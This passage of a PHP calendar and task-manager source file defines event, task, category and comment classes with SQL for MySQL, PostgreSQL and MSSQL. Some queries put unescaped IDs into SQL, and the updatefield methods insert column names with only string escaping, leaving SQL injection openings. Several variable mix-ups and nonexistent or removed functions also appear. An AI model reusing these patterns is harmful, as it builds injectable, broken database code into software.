                   mysql_query(sprintf("UPDATE events SET %s = '%s' WHERE id='%s'",
                   mysql_real_escape_string($field),
                   mysql_real_escape_string($newvalue),
                   mysql_real_escape_string($this->id)
                   ));
                 }
               } elseif(IZ_CALMODE == 'postgre') {
                 pg_query(sprintf("UPDATE events SET %s = '%s' WHERE id='%s'",
                 pg_escape_string($field),
                 pg_escape_string($newvalue),
                 pg_escape_string($this->id)
                 ));
               } elseif(IZ_CALMODE == 'msq') {
                 mssql_query(sprintf("UPDATE events SET %s = '%s' WHERE id='%s'",
                 mssql_escape_string($field),
                 mssql_escape_string($newvalue),
                 mssql_escape_string($this->id)
                 ));
               }
             }
       }
       function getdetails() {
         izsql();
         if(IZ_CALMODE == 'mysql') {
           if($_SESSION['MYSQLi']) {
             global $dblink;
             $editqry = $dblink->query("SELECT * FROM events WHERE id='$this->id'");
             $sqlevent = $editqry->fetch_object();
             $editqry->close();
           } else {
             $editqry = mysql_query("SELECT * FROM events WHERE id='$this->id'");
             $sqlevent = mysql_fetch_object($editqry);
           }
         } elseif(IZ_CALMODE == 'postgre') {
           $editqry = pg_query("SELECT * FROM \"events\" WHERE \"id\"='$this->id'");
           $sqlevent = pg_fetch_object($editqry);
         } elseif(IZ_CALMODE == 'msq') {
           $editqry = mssql_query("SELECT * FROM events WHERE id='$this->id'");
           $sqlevent = mssql_fetch_object($editqry);
         }
          if(empty($eventobj->category)) {
            $this->category = $_SESSION['defaultcategoryevents'];
          } else {
            $this->category = $eventobj->category;
          }
          $this->eventstart = intval($sqlevent->eventstart);
          $this->eventend = intval($sqlevent->eventend);
          $this->title = trim($sqlevent->title);
          $this->description = trim($sqlevent->description);
          $this->author = trim($sqlevent->author);
          $this->venue = trim($sqlevent->venue);
          $this->linkgoogle = intval($sqlevent->linkgoogle);
          $this->allday = intval($sqlevent->allday);
          $this->instanceof = $sqlevent->instanceof;
          $this->status = $sqlevent->status;
          $this->cust1 = trim($sqlevent->cust1);
          $this->cust2 = trim($sqlevent->cust2);
          $this->cust3 = trim($sqlevent->cust3);
          $orig = array(", ",
                        " ",
                        "\r\n",
                        "\r",
                        "\n",
                    );
          $replace = array(',',
                           ',',
                           ',',
                           ',',
                           ',',
                   );
          $this->attendees = trim(str_replace($orig,$replace,$sqlevent->attendees));
          $this->comments = $sqlevent->comments;
       }
  }
  
  /**
  * Allows Task objects to be instanciated from known variables instead of only SQL resources.
  */
  class categoryres {
      var $id;
      var $name;
      var $owner;
      var $type;
      var $public;
      var $color;
      
      function categoryres($id=0,$name=0,$owner=0,$type=0,$public=0,$color=0) {
        $this->id = $id;
        $this->name = $name;
        $this->owner = $owner;
        $this->type = $type;
        $this->public = $public;
        $this->color = $color;
      }
  }
  
  /**
  * Represents an event or task category.
  */
  class category {
      var $id;
      var $name;
      var $owner;
      var $type;
      var $public;
      var $color;
      var $status;
      function category($catobj) {
        $this->id = $catobj->id;
        $this->name = $catobj->name;
        $this->owner = $catobj->owner;
        $this->type = $catobj->type;
        $this->public = intval($catobj->public);
        $this->color = $catobj->color;
        $this->status = 1;
      }
  }
  
  /**
  * Allows Task objects to be instanciated from known variables instead of only SQL resources.
  */
  class todores {
       var $id;
       var $category;
       var $created;
       var $due;
       var $title;
       var $description;
       var $author;
       var $complete;
       var $cust1;
       var $cust2;
       var $cust3;
       var $comments;
       var $status;
       var $icon;
       
       function todores($id=0,$category=0,$created=0,$due=0,$title=0,$task=0,$author=0,$complete=0,$cust1=0,$cust2=0,$cust3=0,$comments=0,$status=0,$icon=-1) {
     	  $this->id = $id;
        if(empty($category)) {
          $this->category = $_SESSION['defaultcategorytasks'];
        } else {
          $this->category = $category;
        }
        $this->created = $created;
        $this->due = $due;
        $this->title = $title;
        $this->description = $task;
        $this->author = $author;
        $this->complete = $complete;
        $this->cust1 = $cust1;
        $this->cust2 = $cust2;
        $this->cust3 = $cust3;
        $this->comments = $comments;
        $this->status = $status;
        $this->icon = $icon;
     }
  }
  /**
  * Represents a single task in the task list.
  */
  class todo {
       var $id;
       var $category;
       var $created;
       var $due;
       var $title;
       var $description;
       var $author;
       var $complete;
       var $cust1;
       var $cust2;
       var $cust3;
       var $comments;
       var $status;
       var $icon;
      
       function todo($todoobj) {
       	  $this->id = trim($todoobj->id);
          if(empty($todoobj->category)) {
            $this->category = $_SESSION['defaultcategorytasks'];
          } else {
            $this->category = $todoobj->category;
          }
       	  if($todoobj->created == 0) {
       	    $this->created = mktime() - $_SESSION['IZ_TIMEOFFSET'];
          } else {  
            $this->created = intval($todoobj->created);
          }
          $this->due = intval($todoobj->due);
          $this->title = trim($todoobj->title);
          $this->description = trim($todoobj->description);
         	$this->author = trim($todoobj->author);
          $this->complete = intval($todoobj->complete);
          $this->cust1 = trim($todoobj->cust1);
          $this->cust2 = trim($todoobj->cust2);
          $this->cust3 = trim($todoobj->cust3);
          $this->comments = trim($todoobj->comments);
          $this->status = trim($todoobj->status);
          $this->icon = intval($todoobj->icon);
       }
       function insert() {
           global $numqs;
           izsql();
           $this->title = clean($this->title);
           $this->description = htmlclean($this->description);
           $this->cust1 = clean($this->cust1);
           $this->cust2 = clean($this->cust2);
           $this->cust3 = clean($this->cust3);
           if(empty($this->title)) {
             iz_error(ERR_TASKNAME);
           }
           if(IZ_CALMODE == 'mysql') {
             if($_SESSION['MYSQLi']) {
               global $dblink;
               $sql = sprintf("INSERT INTO tasks (id,category,created,due,title,description,author,complete,cust1,cust2,cust3,comments,status,icon) VALUES ('%s','%s','%d','%d','%s','%s','%s','%d','%s','%s','%s','%d','%s','%d')",
                      $dblink->real_escape_string($this->id),
                      $dblink->real_escape_string($this->category),
                      $this->created,
                      $this->due,
                      $dblink->real_escape_string($this->title),
                      $dblink->real_escape_string($this->description),
                      $dblink->real_escape_string($this->author),
                      $this->complete,
                      $dblink->real_escape_string($this->cust1),
                      $dblink->real_escape_string($this->cust2),
                      $dblink->real_escape_string($this->cust3),
                      $dblink->real_escape_string($this->comments),
                      $dblink->real_escape_string($this->status),
                      $dblink->real_escape_string($this->icon)
                      );
               if($dblink->query($sql)) {
                 return true;
               } else {
                 return false;
               }
             } else {
               $sql = sprintf("INSERT INTO tasks (id,category,created,due,title,description,author,complete,cust1,cust2,cust3,comments,status,icon) VALUES ('%s','%s','%d','%d','%s','%s','%s','%d','%s','%s','%s','%d','%s','%d')",
                      mysql_real_escape_string($this->id),
                      mysql_real_escape_string($this->category),
                      $this->created,
                      $this->due,
                      mysql_real_escape_string($this->title),
                      mysql_real_escape_string($this->description),
                      mysql_real_escape_string($this->author),
                      $this->complete,
                      mysql_real_escape_string($this->cust1),
                      mysql_real_escape_string($this->cust2),
                      mysql_real_escape_string($this->cust3),
                      mysql_real_escape_string($this->comments),
                      mysql_real_escape_string($this->status),
                      mysql_real_escape_string($this->icon)
                      );
               if(mysql_query($sql)) {
                 return true;
               } else {
                 return false;
               }
             }
           } elseif(IZ_CALMODE == 'postgre') {
             $sql = sprintf("INSERT INTO \"tasks\" (\"id\",\"category\",\"created\",\"due\",\"title\",\"description\",\"author\",\"complete\",\"cust1\",\"cust2\",\"cust3\",\"comments\",\"status\",\"icon\") VALUES ('%s','%s','%d','%d','%s','%s','%s','%d','%s','%s','%s','%d','%s','%d')",
                    pg_escape_string($this->id),
                    pg_escape_string($this->category),
                    $this->created,
                    $this->due,
                    pg_escape_string($this->title),
                    pg_escape_string($this->description),
                    pg_escape_string($this->author),
                    $this->complete,
                    pg_escape_string($this->cust1),
                    pg_escape_string($this->cust2),
                    pg_escape_string($this->cust3),
                    pg_escape_string($this->comments),
                    pg_escape_string($this->status),
                    pg_escape_string($this->icon)
                    );
             if(pg_query($sql)) {
               return true;
             } else {
               return false;
             }
           } elseif(IZ_CALMODE == 'msq') {
             $sql = sprintf("INSERT INTO tasks (id,category,created,due,title,description,author,complete,cust1,cust2,cust3,comments,status,icon) VALUES ('%s','%s','%d','%d','%s','%s','%s','%d','%s','%s','%s','%d','%s','%d')",
                    mssql_escape_string($this->id),
                    mssql_escape_string($this->category),
                    $this->created,
                    $this->due,
                    mssql_escape_string($this->title),
                    mssql_escape_string($this->description),
                    mssql_escape_string($this->author),
                    $this->complete,
                    mssql_escape_string($this->cust1),
                    mssql_escape_string($this->cust2),
                    mssql_escape_string($this->cust3),
                    mssql_escape_string($this->comments),
                    mssql_escape_string($this->status),
                    mssql_escape_string($this->icon)
                    );
             if(mssql_query($sql)) {
               return true;
             } else {
               return false;
             }
           }
       }
       function edit() {
             global $numqs;
             izsql();
             $this->title = clean($this->title);
             $this->description = htmlclean($this->description);
             $this->cust1 = clean($this->cust1);
             $this->cust2 = clean($this->cust2);
             $this->cust3 = clean($this->cust3);
             if(empty($this->title)) {
               iz_error(JS_TASKNAME);
  	         }
  //	         var_dump($this);
             if(IZ_CALMODE == 'mysql') {
               if($_SESSION['MYSQLi']) {
                 global $dblink;
                 if(!$dblink->query(sprintf("UPDATE tasks SET category = '%s', due = '%d',title = '%s',description = '%s',cust1 = '%s',cust2 = '%s',cust3 = '%s',comments = '%d', status = '%s', icon = '%d' WHERE id='%s'",
                   $dblink->real_escape_string($this->category),
                   $this->due,
                   $dblink->real_escape_string($this->title),
                   $dblink->real_escape_string($this->description),
                   $dblink->real_escape_string($this->cust1),
                   $dblink->real_escape_string($this->cust2),
                   $dblink->real_escape_string($this->cust3),
                   $this->comments,
                   $dblink->real_escape_string($this->status),
                   $dblink->real_escape_string($this->icon),
                   $dblink->real_escape_string($this->id)
                   ))) {
                     echo ERR_ERRORTEXT.'&#58; '.mysqli_error().'<br /><br />';
                     echo '<br /><br />';
    	           }
               } else {
                 if(!mysql_query(sprintf("UPDATE tasks SET category = '%s', due = '%d',title = '%s',description = '%s',cust1 = '%s',cust2 = '%s',cust3 = '%s',comments = '%d', status = '%s', icon = '%d' WHERE id='%s'",
                   mysql_real_escape_string($this->category),
                   $this->due,
                   mysql_real_escape_string($this->title),
                   mysql_real_escape_string($this->description),
                   mysql_real_escape_string($this->cust1),
                   mysql_real_escape_string($this->cust2),
                   mysql_real_escape_string($this->cust3),
                   $this->comments,
                   mysql_escape_string($this->status),
                   mysql_escape_string($this->icon),
                   mysql_real_escape_string($this->id)))) {
                     echo ERR_ERRORTEXT.'&#58; '.mysql_error().'<br /><br />';
                     echo '<br /><br />';
    	           }
               }
  	         } elseif(IZ_CALMODE == 'postgre') {
               if(!pg_query(sprintf("UPDATE \"tasks\" SET \"category\" = '%s', \"due\" = '%d',\"title\" = '%s',\"description\" = '%s',\"cust1\" = '%s',\"cust2\" = '%s',\"cust3\" = '%s',\"comments\" = '%d', \"status\" = '%s', \"icon\" = '%d' WHERE \"id\"='%s'",
                 pg_escape_string($this->category),
                 $this->due,
                 pg_escape_string($this->title),
                 pg_escape_string($this->description),
                 pg_escape_string($this->cust1),
                 pg_escape_string($this->cust2),
                 pg_escape_string($this->cust3),
                 $this->comments,
                 pg_escape_string($this->status),
                 pg_escape_string($this->icon),
                 pg_escape_string($this->id)))) {
                   echo ERR_ERRORTEXT.'&#58; '.pg_last_error().'<br /><br />';
                   echo '<br /><br />';
  	           }
             } elseif(IZ_CALMODE == 'msq') {
               if(!mssql_query(sprintf("UPDATE tasks SET category = '%s', due = '%d',title = '%s',description = '%s',cust1 = '%s',cust2 = '%s',cust3 = '%s',comments = '%d', status = '%s', icon = '%d' WHERE id='%s'",
                 mssql_escape_string($this->category),
                 $this->due,
                 mssql_escape_string($this->title),
                 mssql_escape_string($this->description),
                 mssql_escape_string($this->cust1),
                 mssql_escape_string($this->cust2),
                 mssql_escape_string($this->cust3),
                 $this->comments,
                 mssql_escape_string($this->status),
                 mssql_escape_string($this->icon),
                 mssql_escape_string($this->id)))) {
                   echo ERR_ERRORTEXT.'&#58; '.mssql_get_last_message().'<br /><br />';
                   echo '<br /><br />';
  	           }
  	         }
             $numqs++;
       }
       function ajaxedit() {
             global $numqs;
             izsql();
             $this->title = clean($this->title);
             $this->description = htmlclean($this->description);
             if(empty($this->title)) {
               iz_error(JS_TASKNAME);
  	         }
  //	         var_dump($this);
             if(IZ_CALMODE == 'mysql') {
               if($_SESSION['MYSQLi']) {
                 global $dblink;
                 if(!$dblink->query(sprintf("UPDATE tasks SET category = '%s', due = '%d',title = '%s',description = '%s', status = '%s' WHERE id='%s'",
                   $dblink->real_escape_string($this->category),
                   $this->due,
                   $dblink->real_escape_string($this->title),
                   $dblink->real_escape_string($this->description),
                   $dblink->real_escape_string($this->status),
                   $dblink->real_escape_string($this->id)
                   ))) {
                     echo ERR_ERRORTEXT.'&#58; '.$dblink->error.'<br /><br />';
                     echo '<br /><br />';
    	           }
               } else {
                 if(!mysql_query(sprintf("UPDATE tasks SET category = '%s', due = '%d',title = '%s',description = '%s', status = '%s' WHERE id='%s'",
                   mysql_real_escape_string($this->category),
                   $this->due,
                   mysql_real_escape_string($this->title),
                   mysql_real_escape_string($this->description),
                   mysql_real_escape_string($this->status),
                   mysql_real_escape_string($this->id)))) {
                     echo ERR_ERRORTEXT.'&#58; '.mysql_error().'<br /><br />';
                     echo '<br /><br />';
    	           }
               }
  	         } elseif(IZ_CALMODE == 'postgre') {
               if(!pg_query(sprintf("UPDATE \"tasks\" SET \"category\" = '%s', \"due\" = '%d',\"title\" = '%s',\"description\" = '%s', \"status\" = '%s' WHERE \"id\"='%s'",
                 pg_escape_string($this->category),
                 $this->due,
                 pg_escape_string($this->title),
                 pg_escape_string($this->description),
                 pg_escape_string($this->status),
                 pg_escape_string($this->id)))) {
                   echo ERR_ERRORTEXT.'&#58; '.pg_last_error().'<br /><br />';
                   echo '<br /><br />';
  	           }
             } elseif(IZ_CALMODE == 'msq') {
               if(!mssql_query(sprintf("UPDATE tasks SET category = '%s', due = '%d',title = '%s',description = '%s', status = '%s' WHERE id='%s'",
                 mssql_escape_string($this->category),
                 $this->due,
                 mssql_escape_string($this->title),
                 mssql_escape_string($this->description),
                 mssql_escape_string($this->status),
                 mssql_escape_string($this->id)))) {
                   echo ERR_ERRORTEXT.'&#58; '.mssql_get_last_message().'<br /><br />';
                   echo '<br /><br />';
  	           }
  	         }
             $numqs++;
       }
       function delete() {
           izsql();
           if(IZ_CALMODE == 'mysql') {
             if($_SESSION['MYSQLi']) {
               global $dblink;
               $safeid = $dblink->real_escape_string($this->id);
               $dblink->query("DELETE FROM tasks WHERE id='$safeid' LIMIT 1");
             } else {
               $safeid = mysql_real_escape_string($this->id);
               mysql_query("DELETE FROM tasks WHERE id='$safeid' LIMIT 1");
             }
           } elseif(IZ_CALMODE == 'postgre') {
             $safeid = pg_escape_string($this->id);
             pg_query("DELETE FROM \"tasks\" WHERE \"id\"='$safeid'");
           } elseif(IZ_CALMODE == 'msq') {
             $safeid = mssql_escape_string($this->id);
             mssql_query("DELETE FROM tasks WHERE id='$safeid'");
           }
           $numqs++;
       }
       
       function markcomplete() {
          izsql();
          $completeqry = "UPDATE tasks SET complete = '$this->complete' WHERE id = '$this->id'";
          if(IZ_CALMODE == 'mysql') {
            if($_SESSION['MYSQLi']) {
              global $dblink;
              if(!$dblink->query($completeqry)) {
                echo ERR_ERRORTEXT,'&#58; ',mysqli_error();
              }
            } else {
              if(!mysql_query($completeqry)) {
                echo ERR_ERRORTEXT,'&#58; ',mysql_error();
              }
            }
          } elseif(IZ_CALMODE == 'postgre') {
            $completeqry = "UPDATE \"tasks\" SET \"complete\" = '$this->complete' WHERE \"id\" = '$this->id'";
            if(!pg_query($completeqry)) {
              echo ERR_ERRORTEXT,'&#58; ',pg_last_error();
            }
          } elseif(IZ_CALMODE == 'msq') {
            if(!mssql_query($completeqry)) {
              echo ERR_ERRORTEXT,'&#58; ',mssql_get_last_message();
            }
          }
       }
       function updatefield($field,$newvalue) {
             izsql();
             if(strlen($field) > 0 && strlen($newvalue) > 0) {
               if(IZ_CALMODE == 'mysql') {
                 if($_SESSION['MYSQLi']) {
                   global $dblink;
                   $dblink->query(sprintf("UPDATE tasks SET %s = '%s' WHERE id='%s'",
                   $dblink->real_escape_string($field),
                   $dblink->real_escape_string($newvalue),
                   $dblink->real_escape_string($this->id)
                   ));
                 } else {
                   mysql_query(sprintf("UPDATE tasks SET %s = '%s' WHERE id='%s'",
                   mysql_real_escape_string($field),
                   mysql_real_escape_string($newvalue),
                   mysql_real_escape_string($this->id)
                   ));
                 }
               } elseif(IZ_CALMODE == 'postgre') {
                 pg_query(sprintf("UPDATE tasks SET %s = '%s' WHERE id='%s'",
                 pg_escape_string($field),
                 pg_escape_string($newvalue),
                 pg_escape_string($this->id)
                 ));
               } elseif(IZ_CALMODE == 'msq') {
                 mssql_query(sprintf("UPDATE tasks SET %s = '%s' WHERE id='%s'",
                 mssql_escape_string($field),
                 mssql_escape_string($newvalue),
                 mssql_escape_string($this->id)
                 ));
               }
             }
       }
       function getdetails() {
         izsql();
         if(IZ_CALMODE == 'mysql') {
           if($_SESSION['MYSQLi']) {
             global $dblink;
             $editqry = $dblink->query(sprintf("SELECT * FROM tasks WHERE id='%s'",$dblink->real_escape_string($this->id)));
             $sqltodo = $editqry->fetch_object();
             $editqry->close();
           } else {
             $editqry = mysql_query(sprintf("SELECT * FROM tasks WHERE id='%s'",mysql_real_escape_string($this->id)));
             $sqltodo = mysql_fetch_object($editqry);
           }
         } elseif(IZ_CALMODE == 'postgre') {
           $editqry = pg_query(sprintf("SELECT * FROM \"tasks\" WHERE \"id\"='%s'",pg_escape_string($this->id)));
           $sqltodo = pg_fetch_object($editqry);
         } elseif(IZ_CALMODE == 'msq') {
           $editqry = mssql_query(sprintf("SELECT * FROM tasks WHERE id='%s'",mssql_escape_string($this->id)));
           $sqltodo = mssql_fetch_object($editqry);
         }
         if(empty($sqlevent->category)) {
            $this->category = $_SESSION['defaultcategorytasks'];
          } else {
            $this->category = $sqltodo->category;
          }
          $this->created = intval($sqlevent->created);
          $this->due = intval($sqltodo->due);
          $this->title = trim($sqltodo->title);
          $this->description = trim($sqltodo->description);
         	$this->author = trim($sqltodo->author);
          $this->complete = intval($sqltodo->complete);
          $this->cust1 = trim($sqltodo->cust1);
          $this->cust2 = trim($sqltodo->cust2);
          $this->cust3 = trim($sqltodo->cust3);
          $this->comments = $sqltodo->comments;
          $this->status = $sqltodo->status;
       }
  }
  /**
  * Represents a comment on an event or task.
  */
  class comment {
       var $id;
       var $postid;
       var $author;
       var $posted;
       var $text;
       function comment($id,$postid,$author,$text) {
       	   global $user;
           if(empty($id)) {
           $this->id = gen_id();
           } else {
             $this->id = $id;
           }
           $this->postid = trim($postid);
           $this->posted = mktime();
           $this->text = trim($text);
      	   if($_SESSION['authed'] != 1) {
             if(empty($author)) {
               iz_error(ERR_COMMENTAUTHOR);
             } else {
               $this->author = $author.' &#40;'.STR_NOTLOGGEDIN.'&#41;';
             }
           } else {
             $this->author = $_SESSION['uname'];
           }
       }
       function insert() {
           izsql();
           $this->author = clean($this->author);
           $this->text = clean($this->text);
           if(empty($this->text)) {
             iz_error(ERR_COMMENTTEXT);
           }
           if(IZ_CALMODE == 'mysql') {
             if($_SESSION['MYSQLi']) {
               global $dblink;
               $sql = sprintf("INSERT INTO comments (id, postid, author, posted, text) VALUES ('%s','%s','%s','%d','%s')",
                      $dblink->real_escape_string($this->id),
                      $dblink->real_escape_string($this->postid),
                      $dblink->real_escape_string($this->author),
                      $this->posted,
                      $dblink->real_escape_string($this->text));
               if($dblink->query($sql)) {
                 return true;
               } else {
                 return false;
               }
             } else {
               $sql = sprintf("INSERT INTO comments (id, postid, author, posted, text) VALUES ('%s','%s','%s','%d','%s')",
                      mysql_real_escape_string($this->id),
                      mysql_real_escape_string($this->postid),
                      mysql_real_escape_string($this->author),
                      $this->posted,
                      mysql_real_escape_string($this->text));
               if(mysql_query($sql)) {
                 return true;
               } else {
                 return false;
               }
             }
           } elseif(IZ_CALMODE == 'postgre') {
             $sql = sprintf("INSERT INTO \"comments\" (\"id\", \"postid\", \"author\", \"posted\", \"text\") VALUES ('%s','%s','%s','%d','%s')",
                    pg_escape_string($this->id),
                    pg_escape_string($this->postid),
                    pg_escape_string($this->author),
                    $this->posted,
                    pg_escape_string($this->text));
             if(pg_query($sql)) {
               return true;
             } else {
               return false;
             }
           } elseif(IZ_CALMODE == 'msq') {
             $sql = sprintf("INSERT INTO comments (id, postid, author, posted, text) VALUES ('%s','%s','%s','%d','%s')",
                    mssql_escape_string($this->id),
                    mssql_escape_string($this->postid),
                    mssql_escape_string($this->author),
                    $this->posted,
                    mssql_escape_string($this->text));
             if(mssql_query($sql)) {
               return true;
             } else {
               return false;
             }
           }
       }
       function delete() {
           izsql();
           if(IZ_CALMODE == 'mysql') {
             if($_SESSION['MYSQLi']) {
               global $dblink;
               $safeid = $dblink->real_escape_string($this->id);
               $dblink->query("DELETE FROM comments WHERE id='$safeid' LIMIT 1");
             } else {
               $safeid = mysql_real_escape_string($this->id);
               mysql_query("DELETE FROM comments WHERE id='$safeid' LIMIT 1");
             }
           } elseif(IZ_CALMODE == 'postgre') {
             $safeid = pg_escape_string($this->id);
             pg_query("DELETE FROM \"comments\" WHERE \"id\"='$safeid'");
           } elseif(IZ_CALMODE == 'msq') {
             $safeid = mssql_escape_string($this->id);
             mssql_query("DELETE FROM comments WHERE id='$safeid'");
           }
       }
  }
} else {
  // Directly accessed
  header('Location: ../');
} ?>